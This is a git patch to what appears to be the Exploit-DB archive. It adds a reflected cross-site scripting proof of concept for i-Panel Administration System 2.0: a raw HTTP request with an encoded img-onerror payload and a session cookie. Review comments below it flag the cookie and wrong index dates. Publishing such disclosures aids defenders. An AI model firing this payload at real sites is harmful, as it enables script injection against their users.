From a7f5a626135364abdc6d9d7b2b186673b2d80825 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 16 Oct 2021 05:02:08 +0000
Subject: [PATCH] DB: 2021-10-16

2 changes to exploits/shellcodes
i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)
---
 exploits/multiple/webapps/50098.txt | 2 ++
 exploits/php/webapps/50418.txt | 20 ++++++++++++++++++++
 files_exploits.csv | 1 +
 3 files changed, 23 insertions(+)
 create mode 100644 exploits/php/webapps/50418.txt
diff --git a/exploits/multiple/webapps/50098.txt b/exploits/multiple/webapps/50098.txt
index 2d8462712..e90fef9d1 100644
--- a/exploits/multiple/webapps/50098.txt
+++ b/exploits/multiple/webapps/50098.txt
@@ -4,6 +4,8 @@
 # Vendor Homepage: https://visual-tools.com/
 # Version: Visual Tools VX16 v4.2.28.0
 # Tested on: VX16 Embedded Linux 2.6.35.4.
+# CVE: CVE-2021-42071
+# Reference: https://www.swascan.com/security-advisory-visual-tools-dvr-cve-2021-42071/
 # An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution.
diff --git a/exploits/php/webapps/50418.txt b/exploits/php/webapps/50418.txt
new file mode 100644
index 000000000..3c0b65f16
--- /dev/null
+++ b/exploits/php/webapps/50418.txt
@@ -0,0 +1,20 @@
+# Exploit Title: i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)
+# Date: 04.10.2021
+# Exploit Author: Forster Chiu
+# Vendor Homepage: https://www.hkurl.com
+# Version: 2.0
+# Tested on: Chrome, Edge and Firefox
+# CVE: CVE-2021-41878
+# Reference: https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html
+
+As a proof of concept, an alert box can be generated with the following payload.
+Exploit PoC:
+
+GET /lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22XSSVulnerable%22)%3E HTTP/1.1
+Host: Forster
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Cookie: PHPSESSID=7db442d0ed0f9c8e21f5151c3711973e
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept-Language: en-gb
+Accept-Encoding: gzip, deflate
+Connection: close
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 345ae3c1f..114899e8f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44364,3 +44364,4 @@ id,file,description,date,author,type,platform,port
 50412,exploits/php/webapps/50412.txt,"Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS)",1970-01-01,"Hüseyin Serkan Balkanli",webapps,php,
 50413,exploits/multiple/webapps/50413.txt,"Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)",1970-01-01,"Mert Daş",webapps,multiple,
 50414,exploits/hardware/webapps/50414.txt,"Sonicwall SonicOS 7.0 - Host Header Injection",1970-01-01,Ramikan,webapps,hardware,
+50418,exploits/php/webapps/50418.txt,"i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)",1970-01-01,"Forster Chiu",webapps,php,
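Review bot: The captured request in the new exploits/php/webapps/50418.txt carries what looks like a real session identifier in its `Cookie: PHPSESSID=…` header. A published advisory should not ship a session token, and a lost-password page is unlikely to need one, so I would replace the value with a placeholder such as `Cookie: PHPSESSID=<redacted>`. The write-up also never states where the input is reflected or how to remediate it. Judging only from the request line, it appears to be the path segment appended after `lostpassword.php`, so a hedged sentence like `Root cause (to confirm): the request path is written into the response without HTML output encoding; encode it before rendering.` would make the entry usable for defenders. The file also ends without a trailing newline.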
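Review bot: The added index row for 50418 records its date as `1970-01-01`, while the header of exploits/php/webapps/50418.txt in this same commit gives `# Date: 04.10.2021`. The three context rows carry the same epoch value, so this looks like an export placeholder rather than a one-off typo. Anyone sorting or filtering the index by date to triage newly published entries will see this one as decades old. If the column is meant to be populated, the row should carry the real date, e.g. `...(XSS)",2021-10-04,"Forster Chiu",webapps,php,`, assuming the advisory date is written day.month.year.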